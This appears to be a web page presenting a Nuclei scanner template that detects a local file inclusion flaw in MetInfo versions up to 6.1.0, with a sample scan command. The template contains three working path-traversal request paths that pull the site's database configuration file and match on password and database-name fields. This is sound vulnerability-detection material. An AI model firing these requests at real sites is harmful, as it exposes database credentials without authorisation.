Skip to content

MetInfo <=6.1.0 - Local File Inclusion

ID: metinfo-lfi

Severity: high

Author: pikpikcu

Tags: metinfo,lfi

MetInfo 6.0.0 through 6.1.0 is vulnerable to local file inclusion and allows remote unauthenticated attackers access to locally stored files and their content.

id: metinfo-lfi
info:
name: MetInfo <=6.1.0 - Local File Inclusion
author: pikpikcu
severity: high
description: MetInfo 6.0.0 through 6.1.0 is vulnerable to local file inclusion and allows remote unauthenticated attackers access to locally stored files and their content.
reference:
- https://paper.seebug.org/676/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 3
tags: metinfo,lfi
http:
- method: GET
path:
- '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php'
- '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php'
- '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "con_db_pass"
- "con_db_name"
part: body
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022078010110c120358780da99d4be960b57ea8d471c4e6471616b6a0bdc3254e8d3022100d70e04e19ad6428c9e8af05eda3da7eafc6a408ece04eeb729099194cc617bfb:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/metinfo-lfi.yaml"

View on Github